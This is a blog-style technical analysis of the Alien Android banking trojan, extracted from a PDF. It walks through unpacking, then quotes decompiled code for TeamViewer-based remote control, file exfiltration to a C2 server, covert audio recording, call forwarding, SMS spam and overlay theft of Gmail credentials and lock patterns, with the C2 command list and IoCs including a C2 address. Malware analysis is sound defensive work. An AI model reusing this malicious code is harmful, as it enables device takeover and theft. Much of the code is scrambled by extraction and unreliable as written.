Technical analysis of Alien android malware muha2xmad.github.io/malware-analysis/alien/ September 25, 2022 1/17 Muhammad Hasan Ali Malware Analysis learner 10 minute read ميحرل انمحرل اهلل امسب Unpacking If you opened the sample in JEB decompiler, you will find classes names are obfuscated and contains nop code which makes the analysis of the code more harder and it’s an indicator that the sample is packed. So we need to get the decrypted payload. We will use this script with Frida to get the payload. I explained in details how to unpack a sample here and here. After unpacking the sample and get the payload, we see the strings is encrypted using Base64 and other ecryption routine. The encryption routine found in d located in com.mhiauaqmlacl.ypmsfwbkjhsbeoz . We will use this JEB script but we will change the key value to tycusvgndour . Then add the script to the JEB decompiler. To add the script, press F2 and Create then copy the script from github and paste it. To run the script, select the encrypted string and press execute the decrypted strings will be a comment. One by one you will find yourself decrypting all the strings and start analyzing the payload. Big thanks to Axelle Ap. for all the scripts. 2/17 Figure(1): decrypting keys and C2 server TeamViewer helps the devil This an amazing technique which allow the malware to do malicious things even if the user is opening the device. The malware will open an overlay screen which tells the user that there's a system update you need to wait screen, the malware will do malicious actions by conneecting to Figure(2): Fake system update . While the overlay screen is set over the TeamViewer app. 3/17 if(s2.contains( connect_teamviewer jSONObject6. // connect_teamviewer jSONObject6. jSONObject6. jSONObject6. jSONObject6. i this.a("ZWJkNzMxZWFjYTMzNjAzOGJmYTUxZTQ0NWIzYjM1YzdiYWNiOTZiODljYTY5MTNhZGFlYQ==" // com.teamviewer.host.market } if // open_teamviewer jSONObject7. jSONObject7. jSONObject7. i this.a("ZWJkNzMxZWFjYTMzNjAzOGJmYTUxZTQ0NWIzYjM1YzdiYWNiOTZiODljYTY5MTNhZGFlYQ==" // com.teamviewer.host.market send_settings jSONObject8 jSONObject8 jSONObject8 // device_unlock this.a("ZWJkNzMyYWFkYjM1NzUwYWJkYTkxYTVlNDgyMDdlZDhiMGNh" JSONObject this.a.e( getString(this.a( this.a.e( getString(this.a( this.a.e( getString(this.a( this.a.e( getString(this.a( this.a.e( getString(this.a( this.a.f( .f(this, goto label_5; (s2.contains( JSONObject this.a.e( getString(this.a( this.a.e( getString(this.a( this.a.e( getString(this.a( this.a.f( .f(this, jSONObject6 this, this.b. "ZWJkNzMyYWFkYjM1NzUwYWJkYTkxYTVlNDgyMDdlZDhiMGNh" = new JSONObject aK, this, this.b.aL, "ZjhkOTJmYjdjOTM5NzMzMQ==" this, this.b.aO, "ZWVkOTM3YTE="))); // fake this, this.b.aM, "ZTBkMTM4YTBkYjM4"))); this, this.b.aN, "ZWFkNDMzYTdkNTNmNmYzMg==" this); this.a("ZTdjODM5YWFlMTIyNjQzNGE0YmExMjU2NDkyYzY5"))) jSONObject7 = new this, this.b.aO, "ZWVkOTM3YTE="))); this, this.b.aM, "ZTBkMTM4YTBkYjM4" this, this.b.aN, "ZWFkNDMzYTdkNTNmNmYzMg==" this); JSONObject( // fake ))); goto label_5; } if(s2.contains(this.a("ZmJkZDMyYTBlMTI1NjQyMWJkYTUxNTU0NGQ="))) JSONObject jSONObject8 this.a.e(this, this.b. .getString(this.a("ZWVkOTM3YTE=" this.a.e(this, this.b. .getString(this.a("ZTBkMTM4YTBkYjM4" this.a.e(this, this.b. .getString(this.a("ZWFkNDMzYTdkNTNmNmYzMg==" this.a.f(this); goto label_5; } if(!s2.contains(this.a("ZWNkZDJhYWRkZDMzNWUyMGE3YTAxNDUwNTU="))) = new JSONObject( aO, ))); // fake aM, ))); aN, (s2); ))); // password // hidden ))); // blocking s2); // hidden ))); // blocking s2); // hidden ))); // blocking ))) { // ))); )); { )); { // { 4/17 } jSONObject9. jSONObject9. jSONObject9. } Data exfiltration The malware has the ability to exfiltrate the data and sending specific files to the C2 server from the vitim’s device. goto label_5; // device_unlock JSONObject jSONObject9 = new this.a.e(this, this.b.aO, getString(this.a("ZWVkOTM3YTE=" this.a.e(this, this.b.aM, getString(this.a("ZTBkMTM4YTBkYjM4" this.a.e(this, this.b.aN, getString(this.a("ZWFkNDMzYTdkNTNmNmYzMg==" goto label_553; catch(Exception unused_ex) { JSONObject(s2); ))); // fake ))); // hidden ))); // blocking 5/17 if(s2.contains( JSONObject(s2). if s3 Environment. } try this.a("ZTljYTJlYTVjNzA5NjczY2E1YTkwODZjNTgyNjc3Y2JiMGNh")); // cmd i.e(arr_s[0])); // files JSON_SEND } } this.a("Y2RjYTJlYWJjYzc2NmIyNmE2YTI1YjQxNWYzZDNiYzVhNmQ3OGNjNDk0YjY5NjM0Y2NlYWZlMTEzOT // Error json rat jsonRequest open_folder } if { // uploadind_file } Collected data The malware will collect data from the victim’s device such as battery percentage, language used on device, Accessibility Service status, phone number of the used line, Google accounts, and permissions obtained from the device. Then send it to the C2 server. this.a("ZTdjODM5YWFlMTMwNmUzOWFkYTkwOQ=="))) String s3 = new getString(this.a("ZTdjODM5YWFlMTMwNmUzOWFkYTkwOQ==")); (s3.equals(this. = getExternalStorageDirectory(). a("ZjY5Nw=="))) { getAbsolutePath(); { // open_folder // ~/ String[] arr_s = this.a.b(new File(s3)); { JSONObject jSONObject1 = new JSONObject(); jSONObject1.put(this.a("ZWJkNTM4"), // array_files_folder jSONObject1. jSONObject1. // folders jSONObject1. String s4 = this.a.a(this. this.a.i(this, goto label_5; put(this.a( put(this.a( put(this.a( jSONObject1. a("YzJlYjEzOGFlMTA1NDQxYjhk"), this.b. "ZWNkMTJl"), i.e(s3 "ZWVkNzMwYTBkYjI0NzI="), "ZWVkMTMwYTFjZA=="), toString().replace( H + this.a.h(s4)); catch(JSONException this.a.a(this.c, unused_ex) { goto label_5; (!s2.contains(this.a("ZmRjODMwYWJkZjMyNjgzYmFkOTMxZDVhNTIyYw=="))) goto label_273; // uploadind_file jSONObject2 = new JSONObject(s2); // open_folder )); // dir i.e(arr_s[1])); "\\n", ""); s4); // 6/17 try { // BL c0.af)); c0.ar)); // LE : "Yjg= // 1 c0.ae)); 0 ? ((TelephonyManager) c0.q[0])); c0.q[1])); c0.q[2])); c0.q[3])); } jwozx0. CHECK BOT } Recording audio The malware has the ability to record audio without the knowledge of the user // DM jSONObject0. jSONObject0. jSONObject0. jSONObject0. // TW String s3 = String phone_num String s5 = jSONObject0. jSONObject0. // SP jSONObject0. jSONObject0. String s6 = String phone_num "; // 0 String s8 = jSONObject0. jSONObject0. jSONObject0. jSONObject0. // IS String s9 = String phone_num jSONObject0. jSONObject0. jSONObject0. // PS jSONObject0. // PC jSONObject0. // PP jSONObject0. // PO catch(JSONException jwozx0.a.a( a("Y2RlYTBlOGJlYzc2NGIwNjg2ODI1YjcwNzYwYzU4ZTRmNWZhYWRjMg==" put(jwozx0. put(jwozx0. a("Y2NmNQ=="), a("YzlmYw=="), put(jwozx0. put(jwozx0. a("Y2FmNA=="), a("ZGNlZg=="), jwozx0.a("ZGJmOQ=="); // SA = i.s(this) ? "Yjk=" jwozx0.a(phone_num); put(s3, s5); put(jwozx0.a("ZGJlOA=="), put(jwozx0. put(jwozx0. a("ZGJlYg=="), a("YzRmZA=="), jwozx0.a("ZGJlMQ=="); // SY = i.accessibility_status( jwozx0.a(phone_num); put(s6, s8); put(jwozx0.a("ZGJmNQ=="), put(jwozx0.a("YzFmYw=="), put(jwozx0.a("YzFlYg=="), jwozx0.a("YzZlYQ=="); // NR = context1.checkCallingOrSelfPermission( context1.getSystemService( put(s9, phone_num); put(jwozx0.a("Y2ZmOQ=="), put(jwozx0.a("ZDhlYg=="), put(jwozx0.a("ZDhmYg=="), put(jwozx0.a("ZDhlOA=="), put(jwozx0.a("ZDhmNw=="), unused_ex) { s, s2); // DM jwozx0.a( i.battary_percentage( jwozx0.a. : "Yjg="; "ZTZjZDMwYTg=")); sharedpref( // 0 // 1 // null // AD context0)); context1, jwozx0.a.sharedpref(context1, i.u(context0)); // SS Locale.getDefault().getLanguage()); context1, ojfiq.class) ? "Yjk=" i.default_sms_pkg( s1); // ID jwozx0.a.sharedpref( "phone")).getLine1Number() i.google_acc(this)); i.check_permission( i.check_permission( i.check_permission( i.check_permission( this)); context1, jwozx0.a. : // GA jwozx0, jwozx0, jwozx0, jwozx0, )); // ERROR JSON . // SM a.p) == ""; 7/17 protected void try int // tick if SimpleDateFormat( Locale. this.a( // _ // / this.a( // SOUND US). "ZDc=") "ZGJlYzFkOTZlYTc2NTMxMDhhODMyOTc3MWUxYTU0ZmE5YmZj" try if izyiyumk.this SOUND // SOUND s2); // FILE izyiyumk.this onHandleIntent(Intent intent0) { { // tick v = Integer.parseInt(intent0.getStringExtra( String s = intent0.getStringExtra( (v > 0 || v == -1) { String s1 = new this.a("YzVmNTcxYTBkYTdiNzgyY2IwYjUyNDdiNzY3Mzc2YzJlZmNiOTE=" format(Calendar.getInstance().getTime this.d = this.getExternalFilesDir( + s1 + this.a("YTZkOTMxYjY=")); this this.a("ZTZkOTMxYTE=" ()); // MM-dd-yyyy_HH:mm:ss null) + (this // .amr this.b. this.b. String s2 MediaRecorder this.b. a(this.a("Y2VmMTEwODE5ZTA0NDQxNg=="), a(this.a("ZGNkMTMxYTE="), = this.d; mediaRecorder0 = a(this.a("ZGJmNzA5OGFmYQ=="), this.a = false; mediaRecorder0. mediaRecorder0. mediaRecorder0. mediaRecorder0. Thread thread0 @Override public final setAudioSource( setOutputFormat( setAudioEncoder( setOutputFile( = new Thread(new void run() { { (v == -1) { Thread.sleep( } else { Thread.sleep( } } catch(InterruptedException izyiyumk.this.b.a( .a("ZGJlYzEzOTQ5ZTA0NDQxNjg2OWUzZjEzNmQwNjRlZTE5MQ==")); try { mediaRecorder0. mediaRecorder0. izyiyumk.this. String s = izyiyumk. .c.ba); this. String.valueOf( new MediaRecorder(); )); 1); 3); 1); s2); Runnable() { 900000L); v * 1000); unused_ex) { izyiyumk.this.a( stop(); release(); b.a(izyiyumk.this. this.b.j(this, .a("ZmNkMTNmYWY="))); )); // name ), .a("YTc=") + s + d); // FILE REC v)); // Time // START RECORD SOUND "ZGJmNzA5OGFmYQ=="), // STOP RECORD a("Y2VmMTEwODE="), 8/17 izyiyumk.this.a( if if izyiyumk.this.c. izyiyumk.class). izyiyumk.this.a( izyiyumk.this.a( // name // -1 // tick } } } } } } izyiyumk.this.a( SOUND // SOUND Classic features Call and call forward After granting all call permissions, the malware will have the ability to call or forward call. "YWI5Yjdm") aZ).equals( putExtra( "YTU4OQ==")). "ZmFkZDNmYWJjYzMyNWUzNGJjYTgxMjVj")); catch( izyiyumk. "ZGJlYzEzOTQ5ZTA0NDQxNjg2OWUzZjEzNmQwNjRlZTE5MQ==")); izyiyumk.this.b.e(this, + s2); // ### (v == -1) { (izyiyumk.this.b. izyiyumk.this.a("Yjk="))) { Intent intent0 izyiyumk.this.a("ZmNkMTNmYWY="), putExtra(izyiyumk.this.a( izyiyumk.this. return; izyiyumk.this.b.e( return; izyiyumk. catch(Exception return; Throwable return; this.b. this.b.e(this, unused_ex) unused_ex) { a(izyiyumk.this. izyiyumk.this. j(this, // 1 = new Intent( "ZTZkOTMxYTE="), // record_audio startService( this, izyiyumk. izyiyumk.this. { a("ZGJmNzA5OGFmYQ=="), c.ba, s + this, intent0); this.c.aY, ""); c.aY, ""); // STOP RECORD 9/17 try { Intent intent0 = new Intent("android.intent.action.CALL" intent0.addFlags(0x10000000); intent0.setData(Uri.parse("tel:" + context1.startActivity(intent0); String s27 = "USSD: " + s26 + "[143523#]"; i1.a("USSD", s27); i1.f(context1, i1.a.ab, s27); return; } catch(Exception unused_ex) { } try { i1.a("USSD", "Error: Start USSD"); i1.a("USSD", "Error USSD[143523#]"); i1.f(context1, i1.a.ab, "Error USSD[143523#]"); return; label_1329: i2 = jwozx0.a; s28 = jSONObject5.getString(jwozx0. } catch(Exception unused_ex) { return; } try { Intent intent1 = new Intent("android.intent.action.CALL"); intent1.addFlags(0x10000000); intent1.setData(Uri.fromParts("tel", context1.startActivity(intent1); String s29 = "ForwardCALL: " + s28 + i2.a("ForwardCall", s29); i2.f(context1, i2.a.ab, s29); return; } catch(Exception unused_ex) { } Smishing The malware has the ability to send SMSs to any contact using the phone number of the victim. The SMS text is received from the C2 server then sent to another victim. Uri.encode(s26))); a("ZTY=")); // n "*21*" + "[143523#]"; s28 + "#" ); , "#")); 10/17 public try int new Intent( new Intent( ++ } arrayList2); } } } Overlay attack The malware comes with classic features such as overlya attack. opened then the malware will launch the final void send_sms(Context context0, String s, { SmsManager smsManager0 = SmsManager.getDefault(); ArrayList arrayList0 = smsManager0.divideMessage( v = 0; PendingIntent pendingIntent0 = PendingIntent. "SMS_SENT"), 0); PendingIntent pendingIntent1 = PendingIntent. "SMS_DELIVERED"), 0); ArrayList arrayList1 = new ArrayList(); ArrayList arrayList2 = new ArrayList(); while(v < arrayList0.size()) { arrayList2.add(pendingIntent1); arrayList1.add(pendingIntent0); v; smsManager0.sendMultipartTextMessage(s, null, String s2 = "Output SMS:" + s + " text:" + s1 this.a("SMS", s2); this.f(context0, this.a.ab, s2); this.h(context0, this.sharedpref(context0, catch(Exception unused_ex) { html file of the targeted app. String s1) { s1); getBroadcast( getBroadcast( arrayList0, + "[143523#]"; this.a.Q)); If a targeted APP is context0, 0, context0, 0, arrayList1, 11/17 protected void super. this.c this.c. this.c. this.c. this.c. this.c. this.setContentView( } @Override public void super. this.c. this.c. } One of the targeted APPs The malware will try to steal is steal Gmail lockpattern using overlay attack. Then send logs to the C2 server. this.c. this.c this.finish(); credential using onCreate(Bundle bundle0) { onCreate(bundle0); = new WebView(this); getSettings().setJavaScriptEnabled(true); setScrollBarStyle(0); setWebViewClient(new b(this, 0)); setWebChromeClient(new a(this, 0)); loadUrl(this.b.m); this.c); // android.app.Activity onDestroy() { onDestroy(); removeAllViewsInLayout(); removeAllViews(); destroy(); = null; Gmail . The malware will try to Overlay attack . And The malware will try to steal 12/17 public if if } void send_log_injects( if gtzkggpuaqjntiao. gtzkggpuaqjntiao. // com.google.android.gm ==> Gmail APP } if gtzkggpuaqjntiao. s.replace(i.f( ""); // LCJ0eXBlX2luamVjdHMiOiJwaW5jb2RlIiwiY2xvc2VkIjoiY2xvc2VfYWN0aXZpdHlfaW5qZWN0cyI= gtzkggpuaqjntiao. gtzkggpuaqjntiao. gtzkggpuaqjntiao. // Lock Pattern: jSONObject0.put gtzkggpuaqjntiao // data String (!s.isEmpty()) { (gtzkggpuaqjntiao. String s1 = gtzkggpuaqjntiao. gtzkggpuaqjntiao. JSONObject (gtzkggpuaqjntiao. gtzkggpuaqjntiao. jSONObject0 this.a.aG, ""); String s2 = this.a("ZWJkNzMxZWFkOTM5NmUzMmE1YTk1NTUyNTAyZDY5YzBiY2RjY2NmMTlj"); gtzkggpuaqjntiao. (gtzkggpuaqjntiao. gtzkggpuaqjntiao. this.a.aI, ""); gtzkggpuaqjntiao. String s3 = gtzkggpuaqjntiao.this. // ,"type_injects":"pincode","closed":"close_activity_injects" gtzkggpuaqjntiao. this.a.ab, this.a("YzRkNzNmYWY5ZTA2NjAyMWJkYTkwOTVkMDQ2OQ==") this.a("ZDM4OTY4Zjc4YjY0MzI3Njk0")); s) { this.g.isEmpty()) this.g = = new this.f.equals( this.b. this.f = this.f.equals( this.b. this.f = a("YzRmYjE2ZjRkYjBlNDMzOTkxZmUxNzQ2NWYyNDRkYzViMWY this.b. { this.b.b(20); s1; JSONObject(); "grabbing_pass_gmail")) { e(this.mContext, s2; "grabbing_lockpattern")) { e(this.mContext, "grabbing_lockpattern"; f(this.mContext, + s3 + // [143523#] } else { try { // application (gtzkggpuaqjntiao.this.a("ZTljODJjYThkNzM1NjAyMWEwYTMxNQ=="), .this.f); // application jSONObject0.put(gtzkggpuaqjntiao.this.a("ZWNkOTI4YTU="), s); } catch(JSONException } unused_ex) { i i0 = gtzkggpuaqjntiao.this.b; Context context0 = this.mContext; String s4 = gtzkggpuaqjntiao.this.g; String s5 = jSONObject0.toString(); try { String s6 = i0.j(context0, s4); if(s6.isEmpty()) { 13/17 i0.e(context0, s4, s5); } else { JSONObject jSONObject1 = new JSONObject(s6); JSONObject jSONObject2 = new JSONObject(s5); String s7 = jSONObject1.getString("data"); String s8 = jSONObject1.getString("data"); s5 = jSONObject2.getString("data"); i0.a("str_getParams", String.valueOf(s7)); i0.a("str_params", String.valueOf(s5)); JSONObject jSONObject3 = i.a(new JSONObject(s7), new JSONObject(s5)); JSONObject jSONObject4 = new JSONObject(); jSONObject4.put("application", s8); jSONObject4.put("data", jSONObject3.toString()); i0.a("mergedJSON", jSONObject4.toString()); i0.e(context0, s4, jSONObject4.toString()); } } catch(Exception unused_ex) { i0.a("JSON", "ERROR SettingsToAddJson"); i0.e(context0, s4, s5); } Commands These are all the commands which are received from the C2 server to the malware to do the malicious actions. 14/17 jwozx0.a. jSONObject3. String(Base64. // data } a(s, jwozx0.a("ZWZkZDI4ZTRjYzIzNmYwYWFhYTExZjA5MWU=") toString()); // get run_cmd: jSONObject5 = new JSONObject(new decode(jSONObject3.getString(jwozx0. String s25 = jSONObject5.getString( switch(s25) { case "remove_app": { goto label_1633; case "get_all_permission": { goto label_1761; + a("ZWNkOTI4YTU=")), 0), "UTF-8")); jwozx0.a("ZWJkNTM4")); // cmd } case "run_socks5": { goto label_1764; } case "notification": { goto label_1383; } case "send_sms": { jwozx0.a.send_sms( jSONObject5.getString(jwozx0.a("ZTY=")), return; context1, jSONObject5.getString(jwozx0.a("ZmM="))); } case "run_admin_device": { goto label_1706; } case "sms_mailing_phonebook": { goto label_1647; } case "call_forward": { goto label_1329; } case "request_permission": { goto label_1713; } case "send_mailing_sms": { jwozx0.a.a(context1, jSONObject5.getString(jwozx0.a("ZTY=")), jSONObject5.getString(jwozx0.a("ZmM="))); return; } case "remove_bot": { goto label_1655; } case "grabbing_pass_gmail": { goto label_1720; } case "clean_cache": { goto label_1857; } case "ussd": { goto label_1282; 15/17 } case "rat_connect": { goto label_1667; } case "get_data_logs": { goto label_1607; } case "grabbing_lockpattern": { goto label_1737; } case "stop_socks5": { goto label_1801; } case "change_url_connect": { goto label_1673; } case "patch_update": { goto label_1866; } case "url": { goto label_1614; } case "update_inject": { goto label_1808; } case "run_app": { goto label_1621; } case "run_record_audio": { goto label_1815; } case "access_notifications": { goto label_1752; } case "change_url_recover": { goto label_1689; } case "grabbing_google_authenticator2": { goto label_1628; } } If you want to download android malware samples, you can join apkdetect for free. IoC APK hash: ea4960b84756fd82fe43cb2cffdbe464df6dd4d48aa10d1cefe38aa8ac6eb44d Payload (YBIw.json) hash: 603fcae1ef4062087e0e09aa377c03fcc8bbd6f3db443717957f1bfe8c4a4dae 16/17 C2 server: http://185.255.131.145/ Article quote ائيشوى است ﻻ تيم نيبج ىلع ةلبقلاك REF Alien Technical Analysis Report JEB script 17/17